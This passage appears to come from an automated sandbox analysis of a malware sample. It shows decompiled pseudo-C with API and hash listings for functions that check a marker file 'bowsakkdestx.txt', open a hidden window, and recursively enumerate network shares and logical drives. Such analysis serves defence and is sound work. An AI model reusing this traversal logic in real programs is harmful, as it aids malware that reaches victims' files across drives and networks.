                                                                                    					return _t53;
                                                                                    				}
                                                                                    			}













                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _memset
                                                                                    • String ID: .\crypto\buffer\buffer.c$g9F
                                                                                    • API String ID: 2102423945-3653307630
                                                                                    • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                    • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                                                                                    • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                    • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 62%
                                                                                    			E00425341(void* __ebx, void* __edi, intOrPtr _a4) {
                                                                                    				char* _v24;
                                                                                    				intOrPtr _v28;
                                                                                    				signed int _v36;
                                                                                    				signed int _v40;
                                                                                    				short _v300;
                                                                                    				void* __esi;
                                                                                    				void* _t15;
                                                                                    				void* _t17;
                                                                                    				signed int _t20;
                                                                                    				char* _t22;
                                                                                    				signed int _t30;
                                                                                    				void* _t40;
                                                                                    				void* _t42;
                                                                                    				void* _t46;
                                                                                    				void* _t47;
                                                                                    				void* _t49;
                                                                                    				void* _t51;
                                                                                    				signed int _t52;
                                                                                    
                                                                                    				if(_a4 != 0) {
                                                                                    					_push(__ebx);
                                                                                    					_t30 = E0043749C(_a4, 0x55);
                                                                                    					if(_t30 < 0x55) {
                                                                                    						_push(__edi);
                                                                                    						_t15 = E00428CDE(_t40, 2 + _t30 * 2);
                                                                                    						_t42 = _t15;
                                                                                    						if(_t42 != 0) {
                                                                                    							_t5 = _t30 + 1; // 0x1
                                                                                    							_t17 = E004374F1(_t42, _t5, _a4, _t5);
                                                                                    							_t52 = _t51 + 0x10;
                                                                                    							if(_t17 != 0) {
                                                                                    								_push(0);
                                                                                    								_push(0);
                                                                                    								_push(0);
                                                                                    								_push(0);
                                                                                    								_push(0);
                                                                                    								E004242FD(_t30, _t40);
                                                                                    								asm("int3");
                                                                                    								_t49 = _t47;
                                                                                    								_push(_t49);
                                                                                    								_t50 = _t52;
                                                                                    								_t20 =  *0x50ad20; // 0x84f4da2
                                                                                    								_v40 = _t20 ^ _t52;
                                                                                    								_t22 = _v24;
                                                                                    								_t45 = _v28;
                                                                                    								if(_v28 <= 5 && _t22 != 0 && MultiByteToWideChar(0, 0, _t22, 0xffffffff,  &_v300, 0x83) != 0) {
                                                                                    									E00425A97(_t30, _t40, _t45,  &_v300);
                                                                                    								}
                                                                                    								_pop(_t46);
                                                                                    								return E0042A77E(_t30, _v36 ^ _t50, _t40, _t42, _t46);
                                                                                    							} else {
                                                                                    								_t15 = _t42;
                                                                                    								goto L5;
                                                                                    							}
                                                                                    						} else {
                                                                                    							L5:
                                                                                    							goto L6;
                                                                                    						}
                                                                                    					} else {
                                                                                    						_t15 = 0;
                                                                                    						L6:
                                                                                    						return _t15;
                                                                                    					}
                                                                                    				} else {
                                                                                    					return 0;
                                                                                    				}
                                                                                    			}






















                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _wcsnlen
                                                                                    • String ID: U
                                                                                    • API String ID: 3628947076-3372436214
                                                                                    • Opcode ID: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
                                                                                    • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                                                                                    • Opcode Fuzzy Hash: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
                                                                                    • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 94%
                                                                                    			E00462FF0(intOrPtr* _a4, void _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* __ebp;
                                                                                    				signed int _t10;
                                                                                    				signed int _t11;
                                                                                    				signed int _t14;
                                                                                    				intOrPtr* _t15;
                                                                                    				void* _t16;
                                                                                    				signed int _t19;
                                                                                    				intOrPtr _t20;
                                                                                    				signed int _t26;
                                                                                    				void* _t27;
                                                                                    				intOrPtr* _t28;
                                                                                    				void* _t29;
                                                                                    				intOrPtr* _t33;
                                                                                    				intOrPtr* _t34;
                                                                                    				void* _t36;
                                                                                    				void* _t40;
                                                                                    				void* _t41;
                                                                                    
                                                                                    				_t28 = _a16;
                                                                                    				if(_t28 == 0) {
                                                                                    					_t10 = E0047D440();
                                                                                    					_t38 = _a12;
                                                                                    					__eflags = _t10;
                                                                                    					_t24 = _a8;
                                                                                    					_t33 = _a4;
                                                                                    					_t31 =  !=  ? _t10 : "Enter PEM pass phrase:";
                                                                                    					_t11 = E0047D480(_t28, _a12, _t33, 4, _a8,  !=  ? _t10 : "Enter PEM pass phrase:", _a12, _t29);
                                                                                    					_t41 = _t40 + 0x14;
                                                                                    					__eflags = _t11;
                                                                                    					if(__eflags != 0) {
                                                                                    						L9:
                                                                                    						E004512D0(_t24, _t28, _t31, _t38, __eflags, 9, 0x64, 0x6d, ".\\crypto\\pem\\pem_lib.c", 0x6f);
                                                                                    						_t14 = E0042B420(_t33, 0, _t24) | 0xffffffff;
                                                                                    						__eflags = _t14;
                                                                                    					} else {
                                                                                    						do {
                                                                                    							_t15 = _t33;
                                                                                    							_t28 = _t15 + 1;
                                                                                    							do {
                                                                                    								_t26 =  *_t15;
                                                                                    								_t15 = _t15 + 1;
                                                                                    								__eflags = _t26;
                                                                                    							} while (_t26 != 0);
                                                                                    							_t14 = _t15 - _t28;
                                                                                    							__eflags = _t14 - 4;
                                                                                    							if(__eflags < 0) {
                                                                                    								goto L8;
                                                                                    							}
                                                                                    							goto L10;
                                                                                    							L8:
                                                                                    							_push(4);
                                                                                    							_push("phrase is too short, needs to be at least %d chars\n");
                                                                                    							_t16 = E00420E4D();
                                                                                    							E00422408(_t24, _t31, _t33, __eflags);
                                                                                    							_t19 = E0047D480(_t28, _t38, _t33, 4, _t24, _t31, _t38, _t16 + 0x40);
                                                                                    							_t41 = _t41 + 0x20;
                                                                                    							__eflags = _t19;
                                                                                    						} while (__eflags == 0);
                                                                                    						goto L9;
                                                                                    					}
                                                                                    					L10:
                                                                                    					return _t14;
                                                                                    				} else {
                                                                                    					_t34 = _t28;
                                                                                    					_t27 = _t34 + 1;
                                                                                    					do {
                                                                                    						_t20 =  *_t34;
                                                                                    						_t34 = _t34 + 1;
                                                                                    					} while (_t20 != 0);
                                                                                    					_t36 =  >  ? _a8 : _t34 - _t27;
                                                                                    					E0042D8D0(_a4, _t28, _t36);
                                                                                    					return _t36;
                                                                                    				}
                                                                                    			}
























                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _fprintf_memset
                                                                                    • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                    • API String ID: 3021507156-3399676524
                                                                                    • Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                    • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                                                                                    • Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                    • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 58%
                                                                                    			E0040C500(void* __ecx, void* __edx) {
                                                                                    				char _v264;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* __ebp;
                                                                                    				char* _t4;
                                                                                    				void* _t10;
                                                                                    				void* _t19;
                                                                                    				void* _t21;
                                                                                    				void* _t22;
                                                                                    				void* _t23;
                                                                                    				void* _t27;
                                                                                    
                                                                                    				_t21 = __edx;
                                                                                    				_t4 =  &_v264;
                                                                                    				_t19 = __ecx;
                                                                                    				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
                                                                                    				if(_t4 >= 0) {
                                                                                    					PathAppendA( &_v264, "bowsakkdestx.txt");
                                                                                    					_t27 = E004220B6( &_v264, "r");
                                                                                    					__eflags = _t27;
                                                                                    					if(__eflags != 0) {
                                                                                    						_push(_t22);
                                                                                    						_push(2);
                                                                                    						_push(0);
                                                                                    						_push(_t27);
                                                                                    						E0042387F(_t19, _t21, _t22, _t27, __eflags);
                                                                                    						_push(_t27);
                                                                                    						_t10 = E00423455(_t19, _t21, _t22, _t27, __eflags);
                                                                                    						_push(_t27);
                                                                                    						_t23 = _t10;
                                                                                    						E00420CF4(_t19, _t21, _t23, _t27, __eflags);
                                                                                    						__eflags = _t23;
                                                                                    						if(__eflags == 0) {
                                                                                    							L7:
                                                                                    							_push(_t27);
                                                                                    							E00423A38(_t19, _t23, _t27, __eflags);
                                                                                    							__eflags = 0;
                                                                                    							return 0;
                                                                                    						} else {
                                                                                    							__eflags = _t23 - 0x400;
                                                                                    							if(__eflags > 0) {
                                                                                    								goto L7;
                                                                                    							} else {
                                                                                    								E004222F5(_t19, 1, _t23, _t27);
                                                                                    								_push(_t27);
                                                                                    								E00423A38(_t19, _t23, _t27, __eflags);
                                                                                    								return 1;
                                                                                    							}
                                                                                    						}
                                                                                    					} else {
                                                                                    						__eflags = 0;
                                                                                    						return 0;
                                                                                    					}
                                                                                    				} else {
                                                                                    					return 0;
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Path$AppendFolder
                                                                                    • String ID: bowsakkdestx.txt
                                                                                    • API String ID: 29327785-2616962270
                                                                                    • Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                    • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                                                                                    • Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                    • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E0041BA80(struct HINSTANCE__* __ecx) {
                                                                                    				struct HWND__* _t1;
                                                                                    				struct HWND__* _t6;
                                                                                    
                                                                                    				 *0x513244 = __ecx;
                                                                                    				_t1 = CreateWindowExW(0, L"LPCWSTRszWindowClass", L"LPCWSTRszTitle", 0xcf0000, 0x80000000, 0, 0x80000000, 0, 0, 0, __ecx, 0);
                                                                                    				_t6 = _t1;
                                                                                    				if(_t6 != 0) {
                                                                                    					ShowWindow(_t6, 0);
                                                                                    					UpdateWindow(_t6);
                                                                                    					 *0x51323c = _t6;
                                                                                    					return 1;
                                                                                    				} else {
                                                                                    					return _t1;
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • CreateWindowExW.USER32 ref: 0041BAAD
                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                                                                                    • UpdateWindow.USER32(00000000), ref: 0041BAC5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Window$CreateShowUpdate
                                                                                    • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                    • API String ID: 2944774295-3503800400
                                                                                    • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                    • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                                                                                    • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                    • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 83%
                                                                                    			E00410BD0(struct _NETRESOURCE* __ecx, intOrPtr* __edx) {
                                                                                    				char _v8;
                                                                                    				signed int _v16;
                                                                                    				intOrPtr _v24;
                                                                                    				signed int _v28;
                                                                                    				char _v44;
                                                                                    				intOrPtr _v48;
                                                                                    				signed int _v52;
                                                                                    				char _v68;
                                                                                    				intOrPtr _v72;
                                                                                    				signed int _v76;
                                                                                    				char _v92;
                                                                                    				intOrPtr _v96;
                                                                                    				int _v100;
                                                                                    				char _v116;
                                                                                    				signed int _v120;
                                                                                    				intOrPtr _v124;
                                                                                    				intOrPtr _v128;
                                                                                    				char _v132;
                                                                                    				signed int _v136;
                                                                                    				signed int _v140;
                                                                                    				void* _v144;
                                                                                    				struct _NETRESOURCE* _v148;
                                                                                    				signed int _v152;
                                                                                    				void* _v156;
                                                                                    				int _v160;
                                                                                    				int _v164;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* __ebp;
                                                                                    				signed int _t88;
                                                                                    				signed int _t89;
                                                                                    				signed int _t91;
                                                                                    				intOrPtr _t103;
                                                                                    				void* _t107;
                                                                                    				signed int _t110;
                                                                                    				signed int _t111;
                                                                                    				signed int _t112;
                                                                                    				signed int _t114;
                                                                                    				signed int _t116;
                                                                                    				signed int _t118;
                                                                                    				void* _t122;
                                                                                    				signed int _t124;
                                                                                    				signed int _t127;
                                                                                    				struct _NETRESOURCE* _t129;
                                                                                    				signed int _t131;
                                                                                    				signed int _t135;
                                                                                    				signed int _t136;
                                                                                    				signed int _t139;
                                                                                    				signed int _t140;
                                                                                    				signed int _t141;
                                                                                    				signed int _t142;
                                                                                    				signed int _t143;
                                                                                    				signed int _t144;
                                                                                    				signed int _t145;
                                                                                    				signed int _t146;
                                                                                    				signed int _t147;
                                                                                    				signed int _t148;
                                                                                    				signed int _t151;
                                                                                    				signed int _t152;
                                                                                    				signed int _t153;
                                                                                    				signed int _t154;
                                                                                    				signed int _t161;
                                                                                    				intOrPtr* _t164;
                                                                                    				signed int _t167;
                                                                                    				signed int _t168;
                                                                                    				void* _t169;
                                                                                    
                                                                                    				_t129 = __ecx;
                                                                                    				_t168 = _t167 & 0xfffffff8;
                                                                                    				_push(0xffffffff);
                                                                                    				_push(0x4cabd6);
                                                                                    				_push( *[fs:0x0]);
                                                                                    				 *[fs:0x0] = _t168;
                                                                                    				_t169 = _t168 - 0x98;
                                                                                    				_v164 = 0x4000;
                                                                                    				_t164 = __edx;
                                                                                    				_v160 = 0xffffffff;
                                                                                    				if(WNetOpenEnumW(2, 0, 0, __ecx,  &_v156) == 0) {
                                                                                    					_t122 = GlobalAlloc(0x40, _v164);
                                                                                    					_v144 = _t122;
                                                                                    					while(1) {
                                                                                    						E0042B420(_t122, 0, _v164);
                                                                                    						_t169 = _t169 + 0xc;
                                                                                    						_t88 = WNetEnumResourceW(_v156,  &_v160, _t122,  &_v164);
                                                                                    						__eflags = _t88;
                                                                                    						if(_t88 != 0) {
                                                                                    							break;
                                                                                    						}
                                                                                    						_v148 = _t88;
                                                                                    						__eflags = _v160 - _t88;
                                                                                    						if(_v160 > _t88) {
                                                                                    							_t124 = _t122 + 0x10;
                                                                                    							__eflags = _t124;
                                                                                    							_v152 = _t124;
                                                                                    							do {
                                                                                    								_v96 = 7;
                                                                                    								_v100 = 0;
                                                                                    								_v116 = 0;
                                                                                    								_v72 = 7;
                                                                                    								_v76 = 0;
                                                                                    								_v92 = 0;
                                                                                    								_v48 = 7;
                                                                                    								_v52 = 0;
                                                                                    								_v68 = 0;
                                                                                    								_v24 = 7;
                                                                                    								_v28 = 0;
                                                                                    								_v44 = 0;
                                                                                    								_v8 = 0;
                                                                                    								_t151 =  *_t124;
                                                                                    								_v132 =  *((intOrPtr*)(_t124 - 0x10));
                                                                                    								_v128 =  *((intOrPtr*)(_t124 - 0xc));
                                                                                    								_v124 =  *((intOrPtr*)(_t124 - 8));
                                                                                    								_v120 =  *(_t124 - 4);
                                                                                    								__eflags = _t151;
                                                                                    								if(_t151 != 0) {
                                                                                    									__eflags =  *_t151;
                                                                                    									if( *_t151 != 0) {
                                                                                    										_t146 = _t151;
                                                                                    										_t161 = _t146 + 2;
                                                                                    										do {
                                                                                    											_t118 =  *_t146;
                                                                                    											_t146 = _t146 + 2;
                                                                                    											__eflags = _t118;
                                                                                    										} while (_t118 != 0);
                                                                                    										_t147 = _t146 - _t161;
                                                                                    										__eflags = _t147;
                                                                                    										_t148 = _t147 >> 1;
                                                                                    									} else {
                                                                                    										_t148 = 0;
                                                                                    									}
                                                                                    									_push(_t148);
                                                                                    									_t129 =  &_v116;
                                                                                    									E00415C10(_t124, _t129, _t161, _t164, _t151);
                                                                                    								}
                                                                                    								_t152 =  *(_t124 + 4);
                                                                                    								__eflags = _t152;
                                                                                    								if(_t152 != 0) {
                                                                                    									__eflags =  *_t152;
                                                                                    									if( *_t152 != 0) {
                                                                                    										_t143 = _t152;
                                                                                    										_t38 = _t143 + 2; // 0x72
                                                                                    										_t161 = _t38;
                                                                                    										do {
                                                                                    											_t116 =  *_t143;
                                                                                    											_t143 = _t143 + 2;
                                                                                    											__eflags = _t116;
                                                                                    										} while (_t116 != 0);
                                                                                    										_t144 = _t143 - _t161;
                                                                                    										__eflags = _t144;
                                                                                    										_t145 = _t144 >> 1;
                                                                                    									} else {
                                                                                    										_t145 = 0;
                                                                                    									}
                                                                                    									_push(_t145);
                                                                                    									_t129 =  &_v92;
                                                                                    									E00415C10(_t124, _t129, _t161, _t164, _t152);
                                                                                    								}
                                                                                    								_t153 =  *(_t124 + 8);
                                                                                    								__eflags = _t153;
                                                                                    								if(_t153 != 0) {
                                                                                    									__eflags =  *_t153;
                                                                                    									if( *_t153 != 0) {
                                                                                    										_t140 = _t153;
                                                                                    										_t161 = _t140 + 2;
                                                                                    										do {
                                                                                    											_t114 =  *_t140;
                                                                                    											_t140 = _t140 + 2;
                                                                                    											__eflags = _t114;
                                                                                    										} while (_t114 != 0);
                                                                                    										_t141 = _t140 - _t161;
                                                                                    										__eflags = _t141;
                                                                                    										_t142 = _t141 >> 1;
                                                                                    									} else {
                                                                                    										_t142 = 0;
                                                                                    									}
                                                                                    									_push(_t142);
                                                                                    									_t129 =  &_v68;
                                                                                    									E00415C10(_t124, _t129, _t161, _t164, _t153);
                                                                                    								}
                                                                                    								_t154 =  *(_t124 + 0xc);
                                                                                    								__eflags = _t154;
                                                                                    								if(_t154 != 0) {
                                                                                    									__eflags =  *_t154;
                                                                                    									if( *_t154 != 0) {
                                                                                    										_t110 = _t154;
                                                                                    										_t161 = _t110 + 2;
                                                                                    										do {
                                                                                    											_t139 =  *_t110;
                                                                                    											_t110 = _t110 + 2;
                                                                                    											__eflags = _t139;
                                                                                    										} while (_t139 != 0);
                                                                                    										_t111 = _t110 - _t161;
                                                                                    										__eflags = _t111;
                                                                                    										_t112 = _t111 >> 1;
                                                                                    									} else {
                                                                                    										_t112 = 0;
                                                                                    									}
                                                                                    									_push(_t112);
                                                                                    									_t129 =  &_v44;
                                                                                    									E00415C10(_t124, _t129, _t161, _t164, _t154);
                                                                                    								}
                                                                                    								_t161 =  *(_t164 + 4);
                                                                                    								__eflags =  &_v132 - _t161;
                                                                                    								if( &_v132 >= _t161) {
                                                                                    									L41:
                                                                                    									__eflags = _t161 -  *((intOrPtr*)(_t164 + 8));
                                                                                    									if(_t161 ==  *((intOrPtr*)(_t164 + 8))) {
                                                                                    										_push(_t129);
                                                                                    										E004150C0(_t124, _t164, _t161, _t164);
                                                                                    									}
                                                                                    									_t131 =  *(_t164 + 4);
                                                                                    									_v140 = _t131;
                                                                                    									_v136 = _t131;
                                                                                    									_v8 = 2;
                                                                                    									__eflags = _t131;
                                                                                    									if(__eflags != 0) {
                                                                                    										E00418FD0(_t131, __eflags,  &_v132);
                                                                                    									}
                                                                                    								} else {
                                                                                    									_t103 =  *_t164;
                                                                                    									_t129 =  &_v132;
                                                                                    									__eflags = _t103 - _t129;
                                                                                    									if(_t103 > _t129) {
                                                                                    										goto L41;
                                                                                    									} else {
                                                                                    										_t135 = _t129 - _t103;
                                                                                    										_t127 = ((0x92492493 * _t135 >> 0x20) + _t135 >> 6 >> 0x1f) + ((0x92492493 * _t135 >> 0x20) + _t135 >> 6);
                                                                                    										__eflags = _t161 -  *((intOrPtr*)(_t164 + 8));
                                                                                    										if(_t161 ==  *((intOrPtr*)(_t164 + 8))) {
                                                                                    											_push(_t135);
                                                                                    											E004150C0(_t127, _t164, _t161, _t164);
                                                                                    										}
                                                                                    										_t136 =  *(_t164 + 4);
                                                                                    										_v136 = _t136;
                                                                                    										_v140 = _t136;
                                                                                    										_t107 = _t127 * 0x70 +  *_t164;
                                                                                    										_v8 = 1;
                                                                                    										__eflags = _t136;
                                                                                    										if(__eflags != 0) {
                                                                                    											E00418FD0(_t136, __eflags, _t107);
                                                                                    										}
                                                                                    										_t124 = _v152;
                                                                                    									}
                                                                                    								}
                                                                                    								_v8 = 0;
                                                                                    								 *(_t164 + 4) =  *(_t164 + 4) + 0x70;
                                                                                    								__eflags =  *(_t124 - 4) & 0x00000002;
                                                                                    								if(( *(_t124 - 4) & 0x00000002) != 0) {
                                                                                    									_t71 = _t124 - 0x10; // -16
                                                                                    									E00410BD0(_t71, _t164);
                                                                                    								}
                                                                                    								_v8 = 0xffffffff;
                                                                                    								E00410F20( &_v132);
                                                                                    								_t124 = _t124 + 0x20;
                                                                                    								_t129 = _v148 + 1;
                                                                                    								_v152 = _t124;
                                                                                    								_v148 = _t129;
                                                                                    								__eflags = _t129 - _v160;
                                                                                    							} while (_t129 < _v160);
                                                                                    							_t122 = _v144;
                                                                                    						}
                                                                                    					}
                                                                                    					_t89 = WNetCloseEnum(_v156);
                                                                                    					asm("sbb eax, eax");
                                                                                    					 *[fs:0x0] = _v16;
                                                                                    					_t91 =  ~_t89 + 1;
                                                                                    					__eflags = _t91;
                                                                                    					return _t91;
                                                                                    				} else {
                                                                                    					 *[fs:0x0] = _v16;
                                                                                    					return 0;
                                                                                    				}
                                                                                    			}
                                                                                    0x00410e55
                                                                                    0x00410e59
                                                                                    0x00410e60
                                                                                    0x00410e64
                                                                                    0x00410e67
                                                                                    0x00410e67
                                                                                    0x00410e70
                                                                                    0x00410e7b
                                                                                    0x00410e84
                                                                                    0x00410e87
                                                                                    0x00410e88
                                                                                    0x00410e8c
                                                                                    0x00410e90
                                                                                    0x00410e90
                                                                                    0x00410e9a
                                                                                    0x00410e9a
                                                                                    0x00410c79
                                                                                    0x00410ea7
                                                                                    0x00410eb7
                                                                                    0x00410eb9
                                                                                    0x00410ec1
                                                                                    0x00410ec1
                                                                                    0x00410ec6
                                                                                    0x00410c1c
                                                                                    0x00410c25
                                                                                    0x00410c32
                                                                                    0x00410c32

                                                                                    APIs
                                                                                    • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
                                                                                    • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
                                                                                    • _memset.LIBCMT ref: 00410C4C
                                                                                    • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                    • String ID:
                                                                                    • API String ID: 364255426-0
                                                                                    • Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                    • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                                                                                    • Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                    • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 58%
                                                                                    			E00410A50(char __ecx) {
                                                                                    				signed int _v16;
                                                                                    				char _v28;
                                                                                    				intOrPtr _v48;
                                                                                    				char _v52;
                                                                                    				intOrPtr _v56;
                                                                                    				void* _v60;
                                                                                    				char _v64;
                                                                                    				char _v68;
                                                                                    				char _v76;
                                                                                    				unsigned int _v80;
                                                                                    				char _v84;
                                                                                    				unsigned int _v88;
                                                                                    				char _v89;
                                                                                    				intOrPtr _v96;
                                                                                    				intOrPtr _v101;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				unsigned int _t35;
                                                                                    				int _t39;
                                                                                    				int _t40;
                                                                                    				int _t45;
                                                                                    				void* _t48;
                                                                                    				signed int _t52;
                                                                                    				char* _t63;
                                                                                    				signed int _t74;
                                                                                    				signed int _t75;
                                                                                    				void* _t76;
                                                                                    				char* _t77;
                                                                                    
                                                                                    				_t75 = _t74 & 0xfffffff8;
                                                                                    				_push(0xffffffff);
                                                                                    				_push(0x4cab90);
                                                                                    				_push( *[fs:0x0]);
                                                                                    				 *[fs:0x0] = _t75;
                                                                                    				_t76 = _t75 - 0x48;
                                                                                    				_push(_t72);
                                                                                    				_push(_t70);
                                                                                    				_v76 = __ecx;
                                                                                    				_t35 = GetLogicalDrives();
                                                                                    				_v80 = _t35;
                                                                                    				_t52 = 0;
                                                                                    				do {
                                                                                    					if((_t35 >> _t52 & 0x00000001) == 0) {
                                                                                    						goto L11;
                                                                                    					}
                                                                                    					_push(1);
                                                                                    					_v48 = 0xf;
                                                                                    					_v52 = 0;
                                                                                    					_v68 = 0;
                                                                                    					E004156D0(_t52,  &_v68, _t70, " ");
                                                                                    					_v16 = 0;
                                                                                    					_t10 = _t52 + 0x41; // 0x41
                                                                                    					_push(2);
                                                                                    					_t59 =  >=  ? _v76 :  &_v76;
                                                                                    					 *( >=  ? _v76 :  &_v76) = _t10;
                                                                                    					E00413EA0(_t52,  &_v76, _t70, _t72, ":\\");
                                                                                    					_t39 = SetErrorMode(1);
                                                                                    					_t70 = _t39;
                                                                                    					_t62 =  >=  ? _v84 :  &_v84;
